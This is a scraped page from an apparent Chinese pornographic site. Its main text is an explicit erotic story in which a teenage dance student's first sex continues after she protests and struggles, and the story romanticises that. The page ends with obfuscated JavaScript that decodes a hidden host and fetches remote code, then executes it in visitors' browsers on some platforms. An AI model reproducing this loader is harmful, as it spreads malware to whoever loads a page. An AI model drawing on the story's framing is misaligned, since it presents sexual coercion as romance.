返回

情色浮世绘─舞100

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
尼姑思凡(崑曲)明无名氏
小尼姑年方二八正青春,被师父削去了头髮。只因俺父好看经;俺娘爱念佛。暮礼早参,每日里在佛殿上烧香礼佛。 ???? 生下我来疾病多,因此把奴家捨入在空门为尼过活。
与人家追荐亡灵,不住的口念弥陀。只听得钟声法号,不住手的击磬摇铃,擂鼓吹螺。平白地与那地府阴司做工课。密多心经都念过,孔雀经,参不破。唯有莲经七卷最难学,咱师父在眼里梦里都叫过。念几声南无哆佛但哆萨嘛呵的般若波罗。念几声弥陀,恨一声媒婆。念几声娑婆呵,嗳!叫一声没奈何。念几声哆但哆,怎知我感叹还多。
越思越想反添愁闷,不免到迴廊下散步一回,多少是好。(走到五百尊罗汉旁边,一个个塑得好庄严也。)
又只见那两旁罗汉塑得有些傻角。一个儿抱膝舒怀,口儿里念着我;一个儿手托香腮,心儿里想着我;一个儿倦眼半闲,朦胧的觑着我。惟有布袋罗汉笑呵呵,他笑我,时光挫,光阴过。有谁人,有谁人,肯要我这年老婆婆!降龙的,恼着我;伏虎的,恨着我。那长眉大仙愁着我,说我老来时有甚么结果。
佛前灯前,做不得洞房花烛;香积橱,做不得玳筵东阁;钟鼓楼,做不得望夫台;草蒲团,做不得芙蓉软褥。啊呀!天啊!不由人心热如火,不由人心热如火。
奴把袈裟扯破,埋了藏经;弃了木鱼,丢了铙钹。从今去把钟楼佛殿远离却,下山去寻一个年少哥哥。凭他打我骂我,说我笑我。一心不愿成佛,不念弥陀,般若,波罗。
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
「一、二、三、四、五、六、七、八、一、二……」响亮的数拍声几乎压过音乐。
颜雅婷香汗淋漓地踩着轻快的舞步,急速地转动着,然后把身体拱出一个高难度的End动作。
江老师递给颜雅婷一瓶矿泉水,一边迴转音响里面的录音带;一边指正地说:「刚才这一段,从第五小节起,妳的眼神表情不够……」江老师不禁有点微愠道:「…我说过好几次了,妳的动作可以,但是眼神怎么都做不出来?…我做一次给妳看…注意我的眼神表情!」
江老师重新播放音乐,然后翩然起舞,紧身的舞衣裹着曼妙的身材,显得玲珑有緻。江老师名小薇,今年三十七岁,是爵士舞界的佼佼者。或许是舞蹈的关係,让她的身材从不因年龄的增加,或生育过而走样。
颜雅婷今年刚满十八岁,她从七岁开始就跟着江老师学舞。这些年来江老师尽其所能的教导,让她可说是尽得真传。所以当江老师编好这齣『思凡』的新舞曲要发表时,舞者的第一人选当然是颜雅婷。
江老师的这一段舞蹈,正是描述着一位尼姑在思春之际的心神煎熬。她的灵感是来自崑曲里的『尼姑思凡』,这一齣戏可说是她毕生所学的精华,因此他对于这次的公演,抱着既谨慎又执着的态度。
颜雅婷感到很荣幸,能有这个机会舞出老师的新作;只是老师所说的『眼神』却是她惟一无法突破的瓶颈。就这样,有好几回颜雅婷在心烦之余,激动得几乎想放弃她最爱的现代舞。
「…看着我的眼神……」江老师的喊叫声把颜雅婷飞驰的思绪叫醒。颜雅婷凝神地看着。
只见江老师舞姿轻盈地在做着一个屈腿、转身莲坐的动作,看得颜雅婷几乎脱口叫好。曼妙的舞姿及表情,把一位怀春的少女情怀表现得淋漓尽致,尤其是她那既黠慧、天真又带着忧怨、无奈的眼神,还含着一种勾人魂魄的娇媚,让人看了由不得产生疼惜、爱怜之意。
音乐结束了!江老师保持着最后的那个动作不动。她满意自己的表现;可是,她好想哭,因为似乎没有人能替代她,让她有种高处不胜寒的寂寞。
颜雅婷也想哭,她觉得这辈子永远无法做得像老师一样好,或者,像老师的一半……
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
颜雅婷低着头,失魂落魄地走出舞蹈教室的大门。
「嗨!雅婷,我在这里!」毕文豪跨在机车上向颜雅婷挥手。
毕文豪年龄只大颜雅婷几个月,是她的男朋友。自从认识后的半年多来,颜雅婷每次的练舞,毕文豪总是风雨无阻地来接她回家,当然,有时候也会先一起去逛街、看电影……
颜雅婷神色凝重、一语不发地跨上机车后座。毕文豪递给她一顶安全帽,关心地问:「怎么啦!又挨老师骂了吗?」
颜雅婷刚一摇头,就觉的委屈难忍,不由己地趴在毕文豪的肩膀上哭了起来。颜雅婷的这个突如其来的动作,不但让毕文豪手足无措,也让他受宠若惊。
虽然,他俩交往半年多了,彼此的感觉也不错,可是颜雅婷跟毕文豪最亲热的动作,也只不过牵牵手、手搭着肩并坐而已。好几次毕文豪想趁机抱抱她,但是都被颜雅婷很婉转的迴避了。
在颜雅婷的思想里,认为男女亲热的拥抱,或者是亲嘴,是羞耻的事,尤其是假如让人看见了,真会让她羞得无地自容。而毕文豪也了解颜雅婷的个性,知道她很在意别人有意或无意投来的眼光,更在意别人对她的看法或评语。
所以,颜雅婷跟毕文豪“保持距离”、所以,她难以忍受不能突破舞蹈的瓶颈……这些毕文豪都知道,可是毕文豪并不在乎跟她没过比较亲热的动作,他想着:『或许还不到那种程度吧!』而且,毕竟跟她在一起时,就有一种说不出的愉快。或许,这就叫“纯纯(蠢蠢)的爱”吧!
以往,颜雅婷坐在后座,总是以双手扶着毕文豪的肩膀,一方面保持平衡与身体的间距,一方面防止煞车时丰满的胸部会“撞伤”他。而现在,颜雅婷竟然把脸埋靠在毕文豪的肩膀上,这是第一次双方从未有过的近距离,难怪毕文豪会手足无措、心乱如麻,一副木头人的模样,连一句安慰的话也不会说。
毕文豪呼吸着带有淡淡髮香的空气,让他突然觉得这个世界竟然是这么美好,他似乎忘记正在伤心的颜雅婷,而默默的期盼着时间永远就停顿在这一刻。毕文豪闭着眼睛,彷彿沉醉在爱的世界里,手掌不由自主地轻轻拍着颜雅婷的肩背,表示着无限的爱怜之意。
颜雅婷的背部被毕文豪一拍,才突然惊觉自己的失态,随即抬头,紧张的看看四周是否有人在看她们。颜雅婷轻轻地搥打毕文豪的胸膛,低着头的脸颊已涨红得像六月桃花;毕文豪也搔头乾笑着掩饰彼此的尴尬。
毕文豪看着破涕为笑的颜雅婷,提议说道:「我带妳去兜兜风、散散心,好不好?」
颜雅婷觉得过路的人,好像个个都投来嘲笑的眼光,让她极不自在地只想立刻逃离现场。所以,颜雅婷轻轻的点点头表示同意,但是,刚刚毕文豪身上的异性体味,一直萦绕脑海里挥之不去,内心如潮地泛起一股难以言喻的甜蜜。
『噗~~~~』机车呼啸而去,消失在街上的灯海。路上,没人留意他们的存在、离开……
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
上阳明山的仰德大道,在『台湾神学院』附近,是一处俯瞰台北市夜景的最佳定点。每当夜幕低垂,或閤第光临、或三五好友、或成双成对,总是聚在这里赏景聊天,热恋中的男女有的甚至还待在那里通宵达旦呢。
刚过晚上十点,“没事”的渐渐离开了,剩下来的大部份是对对的情侣,在黑暗的角落里或窃窃私语、或轻细嘻笑、或发出不知是甚么声音的声音……
毕文豪与颜雅婷选了一处山腰的矮丛下,并肩席地而坐,眼前便是一片宽阔的视野,两旁及身后的树丛却成了绝佳的屏障。夜空的星光与明如白昼的市街,形成一副悠闲与忙碌的对比,让人由不得有一种“禅”的省思。但是,没有哪一对恋人会放弃正忙碌中的“工作”,而去面对这种省思。
颜雅婷眼光的焦距放在无限远,脑海里思潮汹涌的是老师的舞蹈、将要面临的演出考验……还有刚刚那种在毕文豪肩上的那种异样感觉与激荡。这时,她开始对『尼姑思凡』里小尼姑的感受,似乎有一种朦胧又难以捉摸的领悟。
毕文豪安安静静地坐在一旁,表面上也好像在欣赏夜景,事实上却是不时地在偷看着颜雅婷。而且,附近黑暗中隐约传来引人遐思的声响,更是让他如坐针毡、心神不宁。毕文豪慢慢抬起微颤的手,试探地搭上颜雅婷的肩上,他觉得自己血液急流、心跳剧遽、手心冒汗……
当毕文豪的手轻轻搭在肩上时,颜雅婷不禁微微一震,远驰的思绪立即为之中断,才发觉自己已半靠在毕文豪的胸前。或许是隐密的环境让她宽心;也或许是内心又泛起激荡的情绪,这次颜雅婷并没有拒绝毕文豪的拥抱,她只是象徵性地微微挣扎一下,便遮羞似地把头埋在他宽厚的胸膛。
扑鼻而来的,又是那种令人迷醉的髮香。毕文豪轻轻地吸着,更情不自尽地低头亲吻着颜雅婷乌柔亮丽的秀髮;出汗的手掌也彷彿不受指挥,独立行动地在她的背上游动起来。
颜雅婷脸颊贴着毕文豪的胸膛,耳际传来急促强劲的心跳声,每一声都彷彿是试图要敲开长久紧闭的心扉,而她也感觉自己的内心,似乎也有一种浓烈的欲望在回应着,更此长彼消地压抑着她那种属于少女的矜持。毕文豪似乎是受到颜雅婷沉默的鼓励,怀着忐忑又兴奋的心,渐渐地把嘴唇移到她的后颈上。
「嘤~」颜雅婷轻声的娇哼着。火热的双唇印在冰冷的颈上,带给她极激烈的心灵悸动,她从没想到,这么让人觉得羞耻的动作,竟然会让人感到如此的甜蜜。颜雅婷沉醉了!
毕文豪带着浓浊、急促的呼吸,以嘴唇在颜雅婷的脸颊上探寻着。当四片热唇接触的一霎那,两人的脑海里都有一种忽然爆开来的感觉;一种天旋地转的晕眩。也许,就算山崩地裂发生在他俩面前,他们也会无动于衷的,因为,似乎没甚么事会比他们内心的震撼更甚了!
心灵深处爱与慾的情绪持续地在滋长,使得颜雅婷贴着胸揉动双乳的动作,丝毫没有淫蕩、猥亵的意味;而毕文豪把手伸进裙子里,抚摸着大腿的动作,也不会让颜雅婷感到他行为轻薄、邪恶。虽然,事情的发生有些突兀,但事情的发展却是那么地自然而美妙。
亲吻,似乎没有标準的程序与动作,也许,局外人看着当事人笨拙的动作会觉得可笑,但只要双方都能融入在情绪中,就能把俩人的心灵合而为一。毕文豪与颜雅婷双双都是情窦初开的“生手”,虽然没有优雅的动作,使得牙齿户撞、津液肆流……但是彼此的情感却已经达到昇华的境界。
爱抚,也似乎没有标準的程序与动作,只是随着彼此内心的需要,自然而然地做了。颜雅婷一面昂首接受源源的津液,一面把手伸进毕文豪的上衣里,上下抚摸着他的背。毕文豪轻压着斜卧的颜雅婷,把大腿贴着她双腿根部的柔软处,手掌却隔着薄薄的内裤,抚摸着她丰腴的臀肉。
毕文豪移动身体,换个姿势,一面把嘴唇移向颜雅婷的胸脯上;一面把手伸进她的内裤里……颜雅婷刚刚稍懈地呼了一口气,随即因胸乳被亲舔;私处被侵袭,而有一股前所未有的酥麻感觉,让她受到极激烈的震撼,虽然尽力地压抑着情绪,但仍不由自主地「啊!」了一声。
毕文豪既疯狂又鲁莽地用脸颊、鼻头、牙齿…在颜雅婷的胸脯上胡乱磨蹭着,把她的胸衣推离丰满的乳房,或亲舔、或轻咬地逗弄着胀硬的乳尖;手指也忙碌地压揉着长着稀疏绒毛的嫩肉,触手处滑腻的湿液,无形中让他有一种莫名其妙的冲动。
颜雅婷只觉得体内彷彿有千虫万蚁在啃咬、蠕动;又彷彿在体内有一股熊熊烈火,正无情地四处漫延着,使得她无意识地呻吟着、扭动着。
全身热烫的颜雅婷突然觉得,原本是为了遮羞或美观的衣服,却变成一种令人难受的束缚与累赘。因此当毕文豪试图扯下她的内裤时,她竟欣然地悬浮着腰臀,让内裤顺利地离开身体。
毕文豪的大手掌整个贴在颜雅婷的阴户上,反凸的指关节正紧压着阴唇细缝上的阴蒂。毕文豪虽然是轻轻地揉着,却带给颜雅婷极激烈的震撼,让她不禁一阵又一阵的寒颤起来。颜雅婷稍有一点羞怯,却也捨不得这种美妙的感觉,而没拒绝毕文豪的挑弄。
毕文豪得寸进尺地把中指一曲,勉强地滑入密洞口,他的手指很敏锐地感觉到洞口的狭窄、洞内的豁然开朗、阴道内的那种湿热,还有一股吸吮般的蠕动。
「啊…不要……」微微的刺痛与不适,让颜雅婷紧张得抓着毕文豪的手臂,企图阻止他,但手指在阴道里压揉的快感,随即让她有一种搔着痒处的舒畅。「嗯…唔…」颜雅婷扭动着下身,似乎在指点她的痒处,而阴道里却在不知不觉中汨流出更多的黏液。
毕文豪觉得的手指活动的动作,因为湿液的润滑,而越来越顺畅,不由自主地加快进出或揉转的速度,使得颜雅婷的轻吟跟呼吸也越来越急促。这种充满挑逗、性感的呻吟,使得毕文豪再也无法按捺住激动的情绪,而迫不及待地把颜雅婷的裙子一掀,便压伏在她身上。
毕文豪不知何时就把胀硬的肉棒解放出来,使得压伏在颜雅婷身上的同时,那猩红的龟头也正抵顶住她的蜜穴口。颜雅婷觉得下体有一根硬胀、火热的东西,正挤开两片柔软的阴唇,缓缓地向阴道口推进。
当颜雅婷意会到那是一根男性的阳具时,不禁一阵无地自容的羞愧,正想保持一点矜持而拒绝时,却已经来不及了,因为一阵锥心的刺痛突如其来地传自下体。「啊!痛…不要…呜…不要…」颜雅婷几乎失声惨叫,激烈地缩身、挣扎。
毕文豪虽被颜雅婷这一串动作惊醒不少,但高张的情慾似乎让他已是骑虎难下了,慌忙中随即更使劲的抱紧她,并且用嘴封住她的嘴,而保持着龟头卡在阴道口的姿势不敢乱动。心慌意乱的毕文豪,只得喃喃地说着:「…雅婷…我爱妳…雅婷…我爱妳…我爱妳…」
也许是这些轻声细语彷彿有催眠作用;也许毕文豪不在挤进肉棒,让她的刺痛减轻。颜雅婷激烈的挣扎竟然渐渐缓和下来,而伴随而来的是滚滚的热泪,不知是因刺痛难忍而哭泣;还是失去保贵的贞操而伤心;或者……
毕文豪怜惜地舔拭着颜雅婷脸颊上的泪痕,似乎是为自己的鲁莽侵犯而道歉;也似乎是在恳求不要就此结束这段方兴未艾的情慾。而毕文豪这种柔性的诉求,也很有效地安抚了颜雅婷焦躁不安的情绪。
其实,从一开始的亲热动作,就让颜雅婷潜在的淫慾逐渐攀升,也一直沉醉在肉慾的快感中,要不是那一阵锥心的刺痛,则这一切将会更美好。颜雅婷突然不可理喻地怨恨“处女”这名词,真是“干卿底事”何苦要“搅乱一池春水”?
由于毕文豪的肉棒没再强行挤入,使得颜雅婷阴道口的刺痛稍微减轻,而不变的感觉是那种被充满的快感渐渐增加。毕文豪温柔的亲吻,彷彿又重新开始另一次的挑逗,使颜雅婷的慾火再度死灰复燃,而且来得比上一次还快、还激烈。
颜雅婷觉得阴道内那股蠕动的酥麻越来越激增,甚至比刺痛的痛苦还让人难以忍受。颜雅婷身理自然的反射动作,让她又搓腿、又扭动,试着减轻那种搔不到痒处的难受。但也因此而让毕文豪的肉棒顺势又滑入了半截。
处女窄狭的阴道口与狰狞的龟头,共同塑造出一个难以突破的瓶颈,而只要能冲过这一关,似乎就有另一个柳暗花明、豁然开朗的新境界。这一个“突破”,让颜雅婷与毕文豪都有一股难以言愈的兴奋与快感,忍不住地轻呼一声。
颜雅婷仍然感到阴道口被撑开的刺痛与不适,但是热烫的龟头塞满阴道内的那种充实感,却让她觉得舒畅万分。藉由坚硬的肉棒,彷彿在传递着属于男性的阳刚锐气,颜雅婷隐约地感到到,这是一种亲密的呵护,彷彿是自己在茫然无助中的痛苦中却能得到依靠。
肉棒的更深入,让毕文豪很清楚的感到,阴道内的湿热与蠕动。那种紧裹的温暖,也唤起他染色体里的记忆,让他感受到他也曾经在温暖、密闭的小空间里,享受过这一种温馨与宁静。毕文豪觉得阴道裹住的不仅是肉棒而已,而是让他有如缠腻在母亲的怀抱里一般。
无须经过指导,一种属于动物与生俱来的本能,让毕文豪开始抽动阴道里的肉棒。或许,他无法了解或解释,为何性爱就是要这样抽送,但毫无疑问的这种看似一成不变又单调的活塞动作,却带来一股股源源不断的舒畅感。
颜雅婷觉得阴道里的肉棒,就像举棋不定、难下抉择般地不知要进或要出,而犹豫地在阴道里踌躇起来。而那种退出时的空虚、进入时的满涨;还有肉棒磨擦着阴道壁上的舒畅,让她在无意中呻吟出她的渴望与需求:「…嗯…用力…嗯嗯…深一点…唔…舒服…嗯…快一…点…啊…嗯……」
毕文豪急速地耸动着腰臀,只觉得肉棒彷彿越来越麻木、无知觉,但是那一份酥痒的舒畅却急遽地在体内四处流窜,也持续地累积着随时都可能爆发的能量。情绪的激昂,与激烈运动时的喘息,让他不住地低吼着。
颜雅婷极力地叉开双腿,扭摆、挺举着下身,配合着肉棒的冲刺,也在尽情享受着性爱欢愉中逐渐沉醉、晕眩。直到一股股强劲的热流,如水柱般地撞击着她的子宫深处,又让她顿时觉得她的身体正在迸裂,碎片向四处飞散、飘落。
射精后就像全力冲刺抵达终点后,突然懈尽全身紧绷的肌肉,毕文豪脱力似地瘫软在颜雅婷身上,企图缓和一下身不由己的抽搐。
颜雅婷情绪慢慢缓和,她斜眼偷瞧着毕文豪,一股甜蜜油然而生,她没有后悔失去处女身,但却因为回想起自己陷入淫蕩的疯狂,还有点喜欢上性爱所带来的愉悦,而觉得羞愧,让她脸上又泛起一片红霞……
※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※※
「…来!把『罗汉殿』里这一段再练一遍…」江老师双眉深锁地说着:「…其他部份,应该没问题了…」
公演的日子已迫在眉睫,颜雅婷的表现仍然让江老师觉得美中不足,让原本是师生欢聚如亲人般的热络,一下子彷彿凝固在冰点。
熟悉的音乐响起,颜雅婷凝神地舞动着熟悉的动作,有时候她真的怀疑,自己的每一个细节动作几乎是完美无瑕,为何仍然不能让江老师满意。
此时,颜雅婷一个优美的转身、劈腿,动作虽然完美,可是颜雅婷的内心却突然一阵忐忑。因为这个劈腿的动作,让她的下体一阵微微的刺痛,那是昨晚的“后遗症”。颜雅婷为了掩饰,并没有中断舞步,可是内心却在激荡着。
这个轻微的刺痛,让颜雅婷想起昨夜的缠绵;想起毕文豪那根让人既爱且恨的肉棒;想起偷偷藏着的,那一件沾着秽物与血迹的内裤;想起自己竟然如此淫蕩;想起……想得颜雅婷脸上又是一阵羞红。
「啊!」江老师突然叫了一声,激动的情绪让她几乎说不出话:「…就是这样…对…就是这样…太好了……」这一阵突来的骚动,让颜雅婷不得不停下来,满腹狐疑地望着江老师。
江老师掩不住喜悦,挥舞着双手,说:「…雅婷,太完美了…我要的…刚刚的表现…就是这样…」江老师兴奋的有点顾不了语言的文法。
江老师也感到自己的失态,忙着深呼了一口气,缓和一下情绪,然后说:「表情!刚刚妳的表情就是我所要的,妳的眼神把剧中主角的心态表现得淋漓尽致…」江老师忙着重新播放音乐:「来!让我们从头到尾的再来一遍。记住!刚刚那种眼神……」
当颜雅婷恍然大悟,才觉得这一切发展似乎有点让人啼笑皆非,也突然顿悟:『或许,这就是所谓的“思春”…』颜雅婷随着音乐再度起舞,但她不再凝神去在意舞步了,她飞驰的思绪只想着毕文豪……
长长的舞曲结束了,颜雅婷红晕的脸上布满汗珠,以询问的眼神地看着着江老师,等候着她的评语。
『啪啪啪啪…』江老师不禁鼓掌起来,掩不住喜悦地说:「太好了!太好了!公演时就照着这样作……」江老师突然忧心起来,她担心颜雅婷是碰巧做到这种表情,她不确定的语气问道:「…公演时…妳…可以做得像现在吗?」
颜雅婷笑了,她笑得有点暧昧,但有把握地说:「老师,妳放心!我一定做得到……」
颜雅婷想着:『…或许,公演前…再跟毕文豪上一趟阳明山……』
(全文完)


评分
相关推荐
3.0分

3.0分 情色浮世绘─舞-乱伦小说47d

3.0分

3.0分 【情色浮世绘─舞】【未删节全本】【作者:路人】179

3.0分

3.0分 浮世绘作者candiz930

3.0分

3.0分 三世情缘之火舞系列全e89

3.0分

3.0分 青春色舞16d

3.0分

3.0分 绝色美女的沉浮14b

3.0分

3.0分 青春色舞完f6a

3.0分

3.0分 绝色美女的沉浮完1e4

3.0分

3.0分 情欲世界59f

3.0分

3.0分 前世情人3b6

3.0分

3.0分 乱世情慾5fa

3.0分

3.0分 舞女的一夜情598

3.0分

3.0分 色情男女之色情岳母f0d

3.0分

3.0分 第125章、激情热舞374

3.0分

3.0分 舞蹈老师的激情377

3.0分

3.0分 一代乱世情-淫妻奸情4a8


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};